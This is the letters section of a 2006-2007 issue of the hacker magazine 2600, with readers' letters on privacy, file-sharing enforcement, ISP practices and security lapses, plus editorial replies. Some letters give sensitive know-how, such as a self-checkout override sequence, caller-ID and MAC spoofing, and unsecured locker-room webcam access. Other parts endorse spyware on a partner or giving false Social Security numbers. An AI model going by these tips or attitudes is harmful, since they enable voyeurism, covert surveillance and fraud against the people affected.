It looks like Visa is taking the first steps to demonize the use of money in their current commercial. They apparently don't want us buying things that can't be traced back to who bought it and when. If this line of advertising expands, soon if you pay cash you will be looked at suspiciously. I know some work has been done on this, but someone has to get a form of anonymous card money out into the mainstream market. Thanks for all the good work that you do.
Barada
People who pay cash are already looked at with suspicion in many areas. Airports are only one example of this. The commercial you refer to shows a busy deli at lunchtime where everyone moves at an astonishingly efficient pace until some poor guy tries to pay with cash instead of plastic. The resulting bedlam ends in the complete breakdown of the system. What's most humorous about the whole thing is that the people running this ad campaign probably never thought anyone would draw inspiration from the chaos they illustrated. Efficiency is all fine and good but the insane pressure to conform and the monitoring that goes along with that are not what healthy individuals crave. We encourage people to use cash whenever they can, even if it's only to make a point.

Dear 2600:
I recently started reading 2600 and I especially like the articles about privacy and electronic security. It's a shame the direction this country is headed towards, and unfortunately our elected representatives have so far been total failures at keeping up with privacy in the information age. Many of the worst offenses have been perpetrated by those who are supposed
Winter 2006-2007 Page 37
to be working to protect our rights, not violate them and put us all at risk. Many people probably know that you can do background checks on people at pay websites, but now many states are putting even the most trivial of offenses - such as traffic tickets - online for everyone to see. At mdcourts.gov, for example, you can search by last name or last and first names to find cases including any traffic tickets in the entire state of Maryland. The results include the defendant's full name, full address, driving license number and state, month/year of birth, height and weight, and vehicle tag number, in addition to the fine and disposition. I often check this on people I date, mainly out of curiosity to see what they've done and to see what their age is. Of course, most people have no idea how dangerous it is to give out your real first and last name, so it's easy to look them up and certainly more than half of them have had at least one traffic ticket. Virginia also makes this data available online and they give the month/day of birth, so if they have a ticket there as well as in Maryland, it's easy enough to put together the whole date of birth. Of course, you can also just drop into the local courthouse and look at the actual citation, which they keep on file forever and is open to the public. This often contains the Social Security Number. As you can see, this is everything someone needs to commit identity theft or stalk an ex-lover. Moreover, since the information is probably available in electronic batch format and sold to make the states money, it can be used for targeted advertising, collections, and so on. To be honest, this most trivial of information is much more than cops in most jurisdictions get while doing a traffic stop and entering your data into their car computers. I honestly see no reason why such detailed personal information needs to be made available by state courts online. There's no administrative reason to make it available and even if you think traffic tickets should be public there's no need to include addresses and dates of birth. I personally think criminal records should be nonpublic except for serious offenses where there is a public interest at stake. To blindly make every little detail freely available on the web is the equivalent of putting the whole DMV database online.
JasonB
We'd like to know if anyone has ever been caught giving a false Social Security Number when getting a traffic ticket. Obviously if it's already printed on your license, you would have a tough time pulling that off. Otherwise it seems an almost necessary step to protect at least one important part of your privacy.

Submission
Dear 2600:
I sent you an article and wanted to inquire whether you received/looked into it. It's been a while (6/26/06).
Sandro
When you send us an article (at articles@2600.com) you should receive a confirmation email. If you didn't send your article in ASCII text, we suggest you resend it to meet that standard. In all likelihood you won't get a second confirmation email. This is to avoid mail loops and other annoyances. Within a month or so (sometimes longer if we're swamped), you'll be notified if we intend to use it in a future issue. When it does go to print, you will receive a final email requesting info on where to send your free stuff. If your article is not accepted, you won't hear anything after the initial confirmation. Rejection letters result in people wanting to know exactly why they were rejected, prolonged discussions, arguments, blood feuds, etc. If you haven't heard anything for several months after you send in a submission, then you can assume it's not what we're looking for. But don't let that discourage you from submitting something else. As always, we ask that your submissions not be previously printed or available on the net before they're printed here. And if you want to send things snail mail, our address continues to be: 2600 Editorial Dept., PO Box 99, Middle Island, NY 11953 USA.

Dear 2600:
What about my proposal of article? I have sent you this proposal some months ago - but I didn't receive any reply. Would you let me know if you think to use it?
Riccardo
We generally don't respond to proposals except to say that if you think something would make a good article and you've read our magazine before, then by all means submit it. It would be unfair of us to tell you subjects that are off-limits. Anything can appeal to the hacker mentality if approached from the right angle. Simply ask yourself if this is the kind of thing a reader of ours would appreciate and whether it's different from what you might find in another magazine. So the short answer is: Send it in! Even if it doesn't run in our pages, you've still created something new and that opens up all sorts of possibilities.

Dear 2600:
I have written an article that I am interested in publishing anonymously. I do have some concerns over the protection of my identity should the company I am writing about demand it of you. I have been a reader for about eight years now and would never have considered writing the article to begin with if I was not confident that your organization would keep my identity anonymous, but I guess I am just looking for a little reassurance before submitting it. I have sought legal advice on the topic and was told that if the company were to invest in identifying me and if they were to successfully identify me they might have a case for revealing corporate secrets. To be honest, even as I am writing this I seriously doubt this particular company would care to invest in finding me.... Then again....
Also, I know there are no strict guidelines for article submission as far as length, but my article is a little over 2000 words. Is that cool?
Name Removed
First, we sure hope that wasn't your real name you used in that letter if you're this worried about keeping your identity secret. We can keep our mouths shut but many others can't. In all of the years we've been publishing, we have never given out the name of someone who didn't want their identity revealed. There have been unfortunate instances where information in the name someone used was enough for their employer to track them down and take action. That's why it's so important to not give away details of your location, name, appearance, or anything which someone could use the process of elimination in order to come knocking at your door. We take confidentiality very seriously even if other members of the media don't. But you also have to take precautions on your end, such as not submitting something under the same username that people already know you by. If you wish to remain anonymous, just say so and we won't use any name at all to identify you. But even this may not be enough if you're sending email from an insecure location, such as your school or workplace. As for length, that's not something to worry about if your subject matter is interesting, which we suspect it is.

Question
Dear 2600:
I recently purchased the latest issue of PC Magazine titled: "How to Hack Everything." I was very disappointed, however, when I could not find information therein on how to hack a Gibson. I was told that if I want to be elite, I have to do a righteous hack on some heavy metal. How can PC Magazine get away with leaving out such valuable information?!
vyxenangel
The only way to get the mass media to print the specific info you require is to deluge them with requests and demands for it. Tell them you will file them under "garbage" if they don't listen. That usually works.

Dear 2600:
I am the librarian at DeVry University in Tinley Park, Illinois. One of my student workers subscribes to your magazine and he showed me an article, "Hope and Fear," that was published in 23:3. I think it is a well reasoned, well written article.
A few years ago some students from DeVry went to Defcon in Las Vegas. I went as an "advisor" for the group. I must say that it was quite the culture shock for me. I presumed the seminars would be all technology-based programming, circuits, etc. The discussions included, among other topics, free speech, intellectual freedom, and intellectual property. I must say I was very surprised. Many of the issues discussed were issues that I deal with as a librarian. When I told people that Defcon is a hacker's conference they always wanted to know why I wanted to hang around "people like that." The "cracker" versus "hacker" lecture then follows. I discovered there is a lot more common ground than meets the eye if only one looks for it.
I teach a course entitled "Critical Thinking and Problem Solving" (I call it "Reasoning and Research"). Among the points I try to emphasize heavily in the course are that there are two sides to every issue (e.g., use of technology) and you need to take a reasoned approach to your life.
The "Hope and Fear" article, I think, expresses these ideas very well. As a result, I would like the (unnamed) author's permission to use the article in class.
Paul Burden
Perception is a funny thing. We need to spend a good deal of time dispelling a lot of myths that surround the hacker world. Such assumptions prevail all around us and we need to seek them out and expose them whenever possible. As for using our article in your class, you're most welcome to. We only ask that you let people know where it's from.

Dear 2600:
In the Winter or Spring 2006 issue you printed an article or letter that mentioned probability formulas to reduce least likely numbers from lotto selections. Someone stole my issue.
I would like to try implementing the formula in other areas. The article mentioned the formula was advertised in the classifieds of a major magazine, but did not say which.
Would you tell me the author of the article in your magazine or ask him/her what magazine and issue did the ad appear in?
Greg
The article appeared in the Winter 2005-2006 issue. We're not sure that it would do you much good to know which specific tabloid the "Lottery Secret Revealed" information was advertised in, especially since the story took place 12 years ago. If we receive more specific info, we will share it. Otherwise you should be able to find all sorts of information (good and bad) by simply searching the net.

Dear 2600:
Do you guys print any 2600 stickers? It would be nice to be able to slap the name across my laptop to make my interests clear.
Idgeitman
We had stickers for HOPE Number Six which were given out at the door and we have leftovers which we're sending to anyone who orders a HOPE shirt off our website. A generic 2600 sticker is something we'd like to consider.

Dear 2600:
I've been reading your great magazine for about 11 years now. After so many years and still seeing your ads for ordering back issues it has got me wondering. How is it that after 22 years you still have back issues for every magazine printed? Where do you store them and how much space do they take up? What do you do to protect them from damage? How many copies do you have of the 1984 issues?
Einstein
We believe it's very important to keep things from going out of print which is why we occasionally have to reprint some of the really old issues. The not-so-old ones have enough extras to last a very long time. But if those should run out and people still want them, we'll reprint those issues as well. We keep them in a safe, dry place with lots of room. And we have lots of 1984 issues since those were just unbound sheets of paper. We only printed a few dozen that first year and we've had to reprint them many, many times since.

Dear 2600:
So I'm just taking a shot in the dark here but are you guys named after the blue box and its 2600 hertz sound waves?
Clark Milholland
You need to shoot in the dark more often. That's precisely it. To us, 2600 hertz represented the seizing of technology for individual use and abuse. The rest is history.

Dear 2600:
I am an independent software consultant based in India. I want to reprint 2600: The Hacker Quarterly and distribute it here in India and would like to know what the options are. The average IT magazine here is sold for one or two dollars.
Raj
We are not opposed to such a venture but it would take a lot of coordination as there would be virtually no way for us to do any of the work in the States without losing a ton of money. You're welcome to write to us with more specifics and the like.

Dear 2600:
I heard through the rumor mill that passport covers to block RFID signals were handed out at HOPE to participants. Do these passport covers exist? Where could I get one?
Squealing Sheep
One of our vendors (DIFRwear) was in fact a seller of such RFID blocking passport covers as well as RFID blocking wallets. You can visit their site at http://www.difrwear.com.

Dear 2600:
I have a fourth generation iPod. My battery was running low and I pressed a random sequence of keys on the click wheel. A menu came up in standard text. The menu had the following choices: "batt a2d, a3d stat, firewire, hdd r/w, smart dat, hdd scan, read sn, diskmode, wheel, contrast, audio, status, drv temp, iram test, 5 in 1, reset, key chgr curr, remote, hp status, sleep."
I was going through the menus and then my battery died. Has anyone ever seen this before? And what does the menu do?
Oral Seymour

Dear 2600:
I am a huge fan and I was wondering if you could tell me about a website that could give me good free music without using Limewire or Kazaa.
Pc.Man
The best method of sharing music is through a group known as Friends. They are quite open to passing around any music that you may find interesting and it's a remarkably easy group to join. What's more, they've been doing this for as long as recorded music has existed.

Dear 2600:
May I have some shout outs in the next issue? DoofMasterZ, tOmtwinkie, joel, witeboyshuffle, cry.sys, and d/\ n. Thank you.
Samuel Reed
Did you grow up in a barn? Shout outs are not something you can just write in and request. They must be earned. So the answer is no, you may not have the shout outs listed above. Respect.

Prosecution
Dear 2600:
I was wondering if you could possibly give me some advice. Last December I received a letter in the mail from the RIAA asking for a settlement of $4,225.00 for illegal downloading found on my IP address. I then got an attorney and hoped for the best. They are now demanding the settlement or they intend to file suit against me. Is there any way to get out of this? If you have any advice or information that would help me out please write back very soon.
Kristin
It depends on what you want to get out of this. If you want to fight them, then you should. It's very rare for these entities to insist on a settlement if they think they just detected a violation for the first time. It's likely just a scare tactic since taking you to court is expensive and risky for them as well. Regardless, their accusing you isn't enough on its own. It's relatively easy to hop onto an IP via a WiFi link or even by spoofing the address. The burden of proof is on them to prove that it was actually you who did this. Your attorney really should have told you all this.

Dear 2600:
The Swedish High Court has acquitted a 29-year-old male for sharing files over a P2P network. The reason was that the only "proof" available were screenshots, which the court says is not enough.
Finally! I've heard of many being convicted thanks to screenshots and I got horrified each and every time. Screenshots aren't proof. Those screenshots could easily be fabricated or simply be from an entirely different computer. Just wanted to share what I see as very good news.
aft
Keep in mind that this instance of justice occurred in Sweden, which is about as likely to have an effect on the U.S. judicial system as Pluto.

Revolution
Dear 2600:
I possess a great fondness for obtaining knowledge and executing creativity. Though my interests stretch wide, my main interests are mathematics, physics, electronics, and of course computer science. I am currently 19. Around the time period my age morphed to 18, I contained a paranoia that disabled me from creating and experimenting. This time frame was terrible. I viewed an extremely corrupted society, a society where humans were sued for creating software that fell under a useless patent, a society where curiosity was frowned upon, etc. I am slowly fighting this evil paranoia and continuing my previous events.
I was inspired to produce this letter after reading the following section from the "Congressional Testimony of Emmanuel Goldstein" on totse.com:
"I would like to close by cautioning the subcommittee and all of us not to mix up these two very distinct worlds we are talking about, the world of the criminal and the world of the experimenter, the person that is seeking to learn. To do so will be to create a society where people are afraid to experiment and try variations on a theme because they might be committing some kind of a crime, and at the same time further legislation could have the effect of not really doing much for drug dealers and gangsters, who are doing far more serious crimes than making free phone calls, and it is not likely to intimidate them very much."
We need a revolution.
aRevolutionist
It was almost as if Congress was given a road map of what not to do which they then decided to do anyway.

Clarification
Dear 2600:
In reference to sc's letter in 23:2 I would like to help out all the musician hackers amongst us who would like help tuning their instruments with more than just an "F". Actually, all over the world the concert tuning note is "concert A," which converts into 440 hertz. Most symphonic orchestras keep increasing this standard tuning note due to an increase in relative brilliance of sound, especially American orchestras. To make a long story short, luckily in the western world (meaning west Europe) you will find an 880 hertz dial tone. So maybe if there are any more variations of dial tones in some deserted parts of the world, guitar players will be able to tune all of their strings without even using their ears. What a bummer that was anyhow!
jazzlupO
Duly noted.

Dear 2600:
This is in response to lupO's letter in 23:3. This is a possibility since I had a similar experience and I am assuming this since you listed the ports as being 6881-6999 which are BitTorrent ports. The company that owns the copyright material may have actually tried to download the shared copy from you and sent your ISP a Cease and Desist letter or maybe even an email.
The Joker

Dear 2600:
In response to lupO's letter in 23.3, I would like to point out that in fact Cox is not monitoring the connection's packet payload, but merely the amount and type. I am not defending Cox in the least right now. They are monitoring (I've been shut off before for hosting http services and being one of the reasons they disable hosting on port 80). However there is one thing that lupO forgot to mention or didn't read. The email he was sent should have very specifically mentioned which files he was infringing with, his IP, the time, and the protocol he was using to transfer. All this actually comes from an authorized representative of the movie company. lupO was not caught by Cox; he was caught by the movie company.
Here's the trick, just so you know: They (the movie company's hired spies) share the movie themselves after they download the pirated copy from us (the people), check it, verify it's the actual movie. These movie companies are paying people to share the movies and write down our IP addresses, time, date, files. Here's my workaround: In the email that I received, they (the movie company) requested that the offending files be removed from my system. All these were .R## file parts. They never said anything about what was contained within them! So I unpacked, burned to a CD, put on the network drive, and kept a copy of the AVI (remember, not listed as offending) on my computer, and did as requested. Here's sticking it to the movie companies' bad movies, sharing spies, and stupid lawyers for their awful wording of the email, and forgetting to list "And contained data within listed files."
Cynagen
We suspect they were most interested in you removing the files from public access, not whether or not you held onto a copy as a souvenir.

Dear 2600:
In regards to lupO's letter in 23:3, the ISP is likely telling the truth. I work at an ISP and occasionally we receive abuse complaints. These complaints detail a time and IP address, and indicate that the user of that IP at that time was "doing something bad" (they give details). In most cases, it's just an infected box probing ports or participating in a DDoS or something. However, once in a while, the IP address and time arrive with a description of a copyrighted work or piece of software that was allegedly being infringed. I believe it works like this:
Copyright holder (RIAA or MPAA or MS) or someone they hired tells the intrusion detection group of the infringement. Intrusion detection group tells the ISP. ISP takes action or ignores it.
The ISP's motivations are presumably just keeping their bandwidth bills manageable. The interesting thing is that if the ISP is not actually invading your privacy, they are taking your accuser at their word, likely without any evidence except for possibly large bandwidth usage. It might be interesting to ask the question: Can an ISP legally take action against you based on the second- or third-hand word of a copyright holder? Should they be able to?
G

Dear 2600:
In 23:3, lupO wrote about his ISP blocking Internet access due to file sharing and being able to name the files that were being downloaded, but still saying they do not eavesdrop on their clients' traffic. Quite understandably, lupO experienced some doubts about this. As I work at an ISP abuse desk in Europe, I believe I can shed some light on what happened.
In 1998, the United States Senate passed a quite strict copyright law called the Digital Millennium Copyright Act (DMCA). Title II of DMCA, the Online Copyright Infringement Liability Limitation Act, creates a "safe harbor" for online service providers against copyright liability if they adhere to and qualify for certain prescribed safe harbor guidelines and promptly block access if they receive a notification from a copyright holder or their agent. What this means in practice is that unless ISPs act when they are notified of copyright violations, they are also held liable.
Some large copyright holders (typically media companies like Universal Studios, Paramount, Sony Pictures, etc.) have hired the services of a company called BayTSP in Los Gatos, California. BayTSP runs computers on DC++, BitTorrent, eDonkey, etc. networks, listening to traffic and noting sharing of items owned by their clients. They then contact the ISP with the information, which includes time stamps, file names, sizes, protocols, and IP addresses. Some copyright holders do very similar things at their own operation.
Thus, lupO's ISP probably didn't eavesdrop on their clients and are forced under very severe penalties to take the action they did.
In the country where I work, privacy laws currently prevent us from having to hound our clients in this manner, but this may change in the future since similar European legislation (EUCD) has been passed. I recommend consulting Wikipedia which has quite good articles on these laws.
Eric Smith


Dear 2600:
I feel I should reply to a couple of the letters in 23:3 as I work for an ISP and have the ability to answer these.
The first of these was a letter sent in from lupO where his Internet provider (Cox) had suspended his Internet access for downloading. He was concerned that his provider is monitoring every packet he sends out. This is hardly the case. In situations where people download using Torrent systems or P2P systems without masking their IP somehow, the MPAA or the movie's producers will occasionally send a letter to the ISP stating that "the user with this IP address was downloading this file (e.g., Mission Impossible 3 DIVx.AVI) at this time. Please take action to ensure that sharing of this file by this user is stopped. Thank you." It's been a little while since I've seen one come in so they might not be as vigilant about it anymore.
The second letter I wish to respond to was someone in the UK who had ordered a phone line and DSL, then canceled his phone line and remained on DSL. I know here in Canada where I live things may be different but how it works is our telephone companies are incredibly lazy. The analog signal (voice) on your line can be turned on and off at the flick of a switch essentially. The digital signal (DSL data) however is not as easy to turn on and off. The phone company physically has to add and remove a card in the central office every time someone either subscribes to or cancels DSL service. This on occasion has allowed a digital signal to remain active on a dead telephone line for up to a year and a half in my experience.
01003

Dear 2600:
I just finished reading the article "Never Pay For WiFi Again!" in 23:3. The author said that Apple removed the ability to change one's MAC address since Jaguar. This is not true but they did make it a bit harder. There is a simple program called SpoofMAC that will spoof your MAC address properly with 10.4+ ppc machine airport extremes. I am not sure if this will work on Intel machines. If you prefer the old fashioned way, a Google search will show you how. To any other Mac users who found this article interesting please stop by #kismac on freenode.
BugDave

Proclamation

Dear 2600:
I am a patriot. I send info and bucks to people in the gulag. I do not know how to type and therefore cannot hack. But I'm very interested in acquiring any and all information I can on all subjects. Knowledge is power. If the sheeple believe that their elected officials have their best interest at heart, then let them follow the Judas goat to slaughter. The truth is that you get the government you deserve! If you will read the constitution of the United States you will see that our founding fathers declared that we were born with certain rights that under no circumstances can be revoked. Yet they continually chip away at these rights. One right is the right to keep and bear arms. This has nothing to do with hunting and everything to do with overthrowing an oppressive government! They have now enacted laws that give them the authority to come and confiscate your guns if someone merely puts a restraining order on you. This means that they don't even need evidence of a crime, much less a conviction! So I call upon those who have eyes to see and ears to hear to withhold revenue from the scumbags any way possible. Be it getting free stuff or services from the big corporate institutions to not reporting income or even destroying their databases!
Candycone
South Dakota
We're not going to be starting a Second Amendment interpretation discussion here. But if you believe what you say when exactly will you be using your guns to help overthrow the oppressive government which you obviously have strong feelings about? If that's what they're supposed to be used for, when does the overthrow start and who decides? We admire people who stand up for what they believe in but you seem to be using your dissatisfaction as an excuse to steal and cause havoc without a clear objective. What good will come of that?

Information

Dear 2600:
Check out http://irrepressible.info - a campaign against censorship on the Internet. And the fact that Amnesty International is leading the campaign actually gives me hope that people just might start to listen to what a lot of us has been shouting for so long.
Anders

Dear 2600:
Hello my brothers and sisters of the digital underground. I am writing this in response to a previous article or letter which I read in another issue but unfortunately that issue is floating around my personal library somewhere and cannot be found. The article I'm referring to actually talked about using 711 or relay calling to make collect calls from prison. I thought this was interesting because it's kind of crazy what they charge the families and friends of the incarcerated. I hear that prisoners sometimes have access to computers that have active Internet connections. If this is true they could easily create an AIM (AOL Instant Messenger) screen name and add the screen name MYIPRELAY to their buddy list and use the relay service to make calls to whomever they needed to. This not only allows you to make calls at times you might not normally be able to, but it avoids incurring any collect call fees. After adding the MYIPRELAY to your list you can type in the following: dial xxxxxxxxxx. Replace the x's with the telephone number you're calling and the operator on the other end will make the call for you to the desired party. Now if the facility the prisoner is in blocks the AIM Express website, it's time to use an old workaround, a proxy server such as www.proxify.com or www.thecloak.com. Since these prison systems may not allow users to install .exe files, I would suggest using the AIM Express website to login. Plus there is a hack to add AIM contacts to your Gmail Gtalk list since they both use Jabber logins. This is just a random thought from someone who works tech support for a living and is unhappy with the current political condition and hopes that it will save some people some money from the very greedy phone companies. The Gtalk hack can be found in a book entitled Googlepedia. Enjoy and happy relaying!
soursoles
While we think it's a great idea, we know of no prison that actually allows its inmates this kind of access on the net. It would certainly make the Internet a much more interesting place if they did. Regardless, something needs to be done about the horrible ripoffs prisoners' friends and families must endure at the hands of those phone companies which charge exorbitant collect call surcharges. Communications costs have gone way down across the board. It's unconscionable that rates many times higher are being charged to those who have very little choice in the matter.

Dear 2600:
I did some work with a local telephone PBX installer and noticed the tech dialed "10111" on their buttset to give the phone line the tech was connected to, aka dialed the ANAC. I tested this here in Maine and it works only on Verizon landlines, not on Verizon payphones.
Hawk82

Dear 2600:
Check out this pay service - http://www.spoofcard.com/ - call through them via PIN and you can enter any number you would like to appear as Caller ID and choose a different voice for yourself. Hmmm... the possibilities!
Doda McCheesle
This was demonstrated on "Off The Hook" some months back and has provided many hours of entertainment ever since.

Dear 2600:
First keep up the awesome publication. I read it to stay sane.
I was frequenting one of my favorite forums when I happened upon a link to http://www.privatephone.com. This intrigued me beyond belief. The way it seems to work is that you choose a state, an area code, and then a city. It'll generate a number for those specifications and then all you need to do is provide a valid email address for this messaging service to work. This seems extremely interesting and looks like a lot of fun could ensue, especially along the lines of remaining anonymous in this day and age when that's becoming increasingly harder.
I wouldn't mind some more information on this service if anyone out there knows anything about it. And I certainly hope I'm not poking at something that has already been discussed. Though I don't believe that I am.
Crapinaple
These services are popping up all over. The result is a phone network that has almost no similarity to the one where geography actually meant something. Now we can each have dozens of phone numbers from all parts of the country and confuse the hell out of people who want to know where we really are.

Dear 2600:
I did a bunch of favors for some of the guys at work and they wanted to take me out for lunch. They let me choose the place. I chose a strip club that actually has pretty good food and, of course, good scenery. Looking at the food menu I noticed that they had a website and a section where for a price you can look at the girls in the locker room via a webcam (no sound). I found an unsecured way to access it without even having to get on their website.
My question is whether or not this would be something that you would like me to write about and post the mms address? If not, I can send you the three webcam links for your personal enjoyment.
Also, I have an entertaining story about my ex-girlfriend who I built a computer for (special computer with spyware installed). I found out about her cheating on me with a very well known Hollywood movie star. (Hint: he is known for a very expensive flop that cost about 180 million dollars and was about water.)
Jayster
The webcam thing isn't exactly the hack of the century but if you can put together an article that details how you were able to track down the alternative method of access, it could certainly be useful for many different applications. As for the spyware story, perhaps you could outline how your ex-girlfriend might have been able to get around your surveillance if she suspected that you might be onto her. Some of our readers would like to continue cheating on their significant others without having to worry.

Observation

Dear 2600:
As always I wait the months for your magazine to arrive and then within a couple of days it's over. This time I have something to contribute.
I work for Telus Telecommunications in BC Canada. I am a service tech doing installs and repairs. A while back I had a job to go to a customer because they couldn't get their ADSL to work. Now the customer had just bought a new computer from Staples and Telus had hooked ADSL up in the CO, so normally there shouldn't be a problem. The customer is given filters for their phones and an instruction CD for software installs and setup.
One thing they have to do is register their MAC address with our OCA server. This customer wasn't able to do this and took the computer back to Staples, which was an hour's drive from the town they lived in.
When I got to the customer's house I didn't have any trouble registering their MAC addy or being able to surf online. The customer was happy and I left.
The next day I got a call back. They couldn't surf. After playing around checking the settings and not finding anything wrong, I called our support group to see if something in the software was changed. Lo and behold we found that the same MAC address was registered in another part of the province.
Now we all thought that every MAC address was supposed to be unique. I instructed the customer to take the computer back for a new NIC card. They were told that the computer would have to be returned to HP for the change to take place and instead sold them a router. The router solved their problem and they were again happy customers.
I am guessing that this was a unique and one time error or that the NIC cards were coming out of a country new to this type of marketing such as China. I'm not sure what the answer is but it was a fluke that the support tech decided to look up the MAC registration because they normally don't look that deep or far.
Adelain

Dear 2600:
I have a little story about the Manchester (New Hampshire) Police Department.
About two weeks ago the local chapter of Easter Seals NH was having an ID Card Night for kids with ASD and PDD (Autism Spectrum Disorder and Pervasive Developmental Disorders). My son is mildly autistic (maybe he will crack the NSA's encryption code!). Anyway, there was a nice policewoman who took us out for a little tour of the police cruiser. I was watering at the mouth - police radio, police radar, and, most of all, onboard computer! As far as I could tell (hands-off of course), I think its OS was either Windows NT Embedded or Windows CE :.x (looking at the interface). More than likely NT Embedded.
Now for the fun part. I said to the nice policewoman, "Hey, can we see the computer? My son loves computers." "By all means," she said. She pulled the stylus out of the holder and tapped the screen. The screensaver went to the standard Windows logon screen. The username was simply "mpd" (Manchester Police Department, I assume). She left the password blank and hit the "logon" button. Wow!!
The interface came to life. On the screen was an interface for anything. You name it. Driver's license lookup, license tag lookup, GPS coordinates of the cruiser. The information! I actually had to keep my hands at my sides, it was so tempting. Now what really frightens me is that the car was unlocked and out of view. So what was to stop anyone with half a brain getting all of the juicy information that Big Brother had?
So much for security.
Zaphod
We imagine even half a brain would be sufficient to steer someone away from messing with a police car. We wonder what checks and balances are in place to prevent abuse of this system by both authorized and unauthorized parties. Imagine a cop who's also a stalker and the risks become all too clear.

Dear 2600:
I recently did some traveling in Japan and I was struck by the differences in airport security there versus here. The security officers in Japan clearly took their job seriously and didn't appear both in physical appearance and body language to have made the choice of working airport security over working at McDonald's. What was most immediately obvious was the number of X-ray machines. I had traveled through both DFW and LAX on my way to Japan and neither airport had more than two X-ray machines operating at any time resulting in a huge line, frustrated passengers, and overworked guards. Japan had nine X-rays going at all three airports I went to there. But the most intriguing thing I saw that prompted me to write this letter was a liquid testing machine they have. They allow passengers to take liquids on flights domestically and internationally unless that travel is through U.S. airspace. They have a machine that is about 18 inches tall and has two C shaped openings. At the base of these two openings is a metal plate of what looked like tin. I placed my drink on the opening for plastic bottles (the other is for metal containers) and after a few seconds a green light came on and I was allowed to keep my drink. I wanted to learn more about the device but the only English on it was what appeared to be a company logo with the letters GTC and ironically the on/off switch. As it was explained to us, foreigners have absolutely no rights in Japan so I was hesitant to take a photo of the device. If anybody knows anything about this machine, write an article. I want to learn more about it. It obviously wasn't new so it wasn't in response to anything recent.
G8M76010
Japan is the place to go if you want to see weird machines that know what they're doing. If you just want to see confused people who have no clue what they're doing, a trip to a domestic airport will be most rewarding.

Dear 2600:
I tried to log onto my Key Bank online account and discovered a new security "feature." All computers logging on now are required to be registered to access the site. According to the representatives I've spoken with, this entails only a logging of my IP address. To register I must provide my ATM card number, PIN(!), and debit card issue number. How many clueless WiFi users are going to have their identity stolen because of this "feature?" There isn't even a warning about accessing account information over WiFi. Why are the people charged with our security always so clueless about what security really is?
8rian

Dear 2600:
I was just looking through the 2600 cover archive and noticed in May 1987 a plane was depicted flying into the twin towers. It can be seen in the "covers" section of www.2600.com.
By the way, It would be rad if you guys did a retro cover one of these quarters.
knotnaught
We were hoping this wouldn't come up. And now we're probably going to have to reprint those 1987 issues. As for the retro stuff, perhaps in the future.

Dear 2600:
I want to thank you and Arcade One for raising my sense of paranoia. The other day I went out to get some lunch so, while I was out, I decided to stop by the bookstore to get the new Fall issue of 2600. After standing in line for 20 minutes due to the incompetence of the bookstore cashier, I found myself rushed to get lunch and get back to work. I decided Panera Bread was the best choice since it was close by and it was closest to my workplace.
I had never been inside any Panera Bread prior to this visit. There were just a few people in line since it was only 11 am. So while I stood there, I pulled out the issue and started to read the article "Identity Theft: Misinformation Can Be Your Friend" by Arcade One. Eventually it was my turn to order, so I blurted out my order and returned to my reading. Then I heard the cashier ask, "What's your name?" I froze. There must have been an obvious, shocked look on my face because the cashier snickered. At first I thought she might be trying to hit on me, but then I realized she really wanted to know my name to complete the transaction. I asked myself, "Why am I required to give my name to purchase a sandwich?" All sorts of thoughts raced through my head and when she asked the second time I knew I had to say something, because by that time people were starting to get in line behind me. So, in desperation I pulled out a hack I had used for years against Radio Shack. I lied and said my name was Mike. The cashier entered the data into the computer/cash register and handed me my ticket. The name "Mike" was printed on the receipt next to the ticket number.
My heart was actually racing as I stood by the pick-up area of the counter. What if they asked for ID to prove that I was this strangely behaving "Mike" who had ordered this very sandwich in question? What if another Mike, or God forbid, two Mikes, Mikes who had told the truth, had gotten in line behind me and were now approaching the pick-up counter? What if they took my sandwich? Would my sandwich die because I lied?
After a few minutes I heard a call for "Mike!", so I grabbed the food, just glad I had asked for it "to go." As I opened the door I felt this rush of adrenaline, as if I had committed some crime and gotten away with it. By the time I got back to the car the rush disappeared. I realized that Panera Bread was probably using the name method to keep from mixing up the orders or personalizing the experience, but then wouldn't the unique ticket number suffice? I also found myself wondering what happened to that data the cashier entered. Did it go to a central server? How long would it be kept? What if I had said my name was Osama? What if I had refused to give a name? I think what I should have done was to have asked why they required my name at all, but I was too embroiled in conspiracy theories to have thought of that option. However, you might want to try it for yourselves, 2600. I'm not sure if they all do this and I won't say which one it is, but the Panera Bread store I visited is less than 15 miles from the St. James, New York address you list in your magazine.
Mike the Liar
We detect what may be a tinge of sarcasm here. Nobody should be this afraid to give their name to someone in order to get a sandwich. But you touch upon a good point, regardless of whether or not it was intentional. Lying is perfectly acceptable in such situations. People give out way too much personal information to other people who not only don't require it but who have no way on earth of verifying it in the first place. The same holds true for the many entities that ask for your Social Security Number. Unless they are the government, a financial institution, or someone who is planning on running a credit check, any number will do as it is only used for verification the next time you speak to them. We don't mean to buy into the pervasive paranoia that insists on suspicion of all those around us and thinks of trust as a four letter word. But at the same time, people need to know they are free to be anyone they wish in a sandwich shop or elsewhere.

Dear 2600:
Last night my girlfriend and I were at a local Meijer super store. Most times I'll just go to the register to check out. The employees are usually friendly enough. We were in a bit of a hurry this time, so we went to the U-Scan. I had some cash on me and she had her debit. I assumed that because after I put in my cash and the "other payments" option was still on the screen that the programmers of the U-Scan were bright enough to figure out that if a card is swiped to only charge the difference. No dice. Instead, the machine flips out! The under-trained employee didn't ask us what happened. He just simply canceled the order and printed a receipt. Apparently the machine didn't even record that I put money into it. Or, if it did, he deleted it. Regardless, all he did to do this was touch the corner of the screen, type 27, then type 240. I'm assuming one of the numbers is a store number and the other is his employee ID. The menu was very simple; a monkey could navigate through it. With a bit of a distraction it seems like you could start printing your own receipts! This is stealing and illegal so don't! But it's always fun to play with Meijer employees.
chemdream

Dear 2600:
Greetings all. Further to my letter in the last issue, I thought that you'd be interested in hearing about this. Tesco (and, to my knowledge, ASDA too) have just installed a spate of "self-service checkouts." This is quite a new thing for the U.K. The supplier is NCR, and the model is their "FastLane" system (http://www.ncr.com/en/products/hardware/sa_selfchk.htm). I haven't had a chance to try the usual "tap the four corners" and other methods to get to setup screens. I'm sure that others have, but I have always been too busy whilst using one to have a chance to. I have noticed this, however. When you choose to pay with a credit/debit card, the system will scan your card but won't ask for a PIN number nor a signature. You swipe your card and it will just sit there and store the number and charge your account (just like the other till (POS) systems do). This is quite worrying, as I'm sure you are already aware, from a (in)security point of view. It isn't a difficult colligation to say that "this is the most laxly secured idiocy ever to help fraudsters." I wonder what else these esteemed developers will decide to thrust upon the unsuspecting sheep-flock of a public that we have.
Keep your cards close and their details closer.
Marxc2001

Dear 2600:
